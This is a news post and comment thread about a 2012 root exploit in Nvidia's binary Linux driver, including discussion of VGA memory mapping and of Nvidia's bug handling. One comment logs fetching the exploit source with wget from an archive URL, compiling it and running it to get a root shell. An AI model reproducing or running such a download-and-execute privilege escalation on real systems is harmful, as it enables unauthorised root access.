Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole
An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public."
The one releasing the exploit (relayed to him anonymously) is David Arlie, a well-known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.
Re:A view to a kill. (Score:5, Informative)
VGA maps the video card's memory [osdever.net] into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by wanting to retain compatibility with older video standards (CGA, EGA).
works here (Score:5, Informative)
It's certainly legit.
c@v:~$ ... ... ./nvid-root
c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin
2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225]
c@v:~$ mv 86747-001.bin nvid-root.c
c@v:~$ gcc nvid-root.c -o nvid-root
c@v:~$
[*] IDT offset at 0xc1808000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc18086e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
[*] Have root, will travel..
sh-4.2#
sh-4.2#
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
sh-4.2#
sh-4.2# lsb_release -a
LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
Distributor ID: Ubuntu
Description: Ubuntu 12.04 LTS
Release: 12.04
Codename: precise
sh-4.2# uname -a
Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
sh-4.2#
Re:Who did he send it to at Nvidia? (Score:5, Informative)
Yeah you don't get more flimsy evidence than a working exploit.
Re:works here (Score:5, Informative)
[*] IDT offset at 0xffffffff81b60000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81b60dc0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffffffffffe (-2)
[*] Failed to get root.
Re:A view to a kill. (Score:3, Informative)
Windows 7 still includes a VGA video driver.
Re:Nvidia rotten to the core (Score:5, Informative)
Frankly a root exploit is one of their lesser sins.
Then their cardinal sins must be Hitlerian; (from David Arlie's write-up)
You forget the episodes like their broken hardware accelerated NIC, that dropped random bits.
First they spent months claiming there was no bug.
Then they spent months claiming they'd fixed it (they hadn't).
Then they claimed they'd fixed it when they'd actually just disabled the acceleration and fallen back to software!
Over a year of data loss for anyone that believed them.
Same thing happened with their attempt at accelerated sound hardware. And pretty much everything else they've tried accelerating apart from GPUs. GPUs have a whole different class of problems to do with not listening to feedback.
Re:Who did he send it to at Nvidia? (Score:3, Informative)
Re:Nvidia rotten to the core (Score:4, Informative)
I think they might have a culture of not listening. The chief maintainer of Nvidia's official forums posted, after Linus's outburst, a series of posts about how Linus's complaints had caused "him and his family severe grief", and that Linus should shut up, and would not be welcome on the forum, and that anybody talking about his comments would be banned.
Jesus Christ, that guy needs serious help, but it might be an institutional problem. Maybe they are taught that any complaints about Nvidia are actually mortal stains on their honour as employees of Nvidia??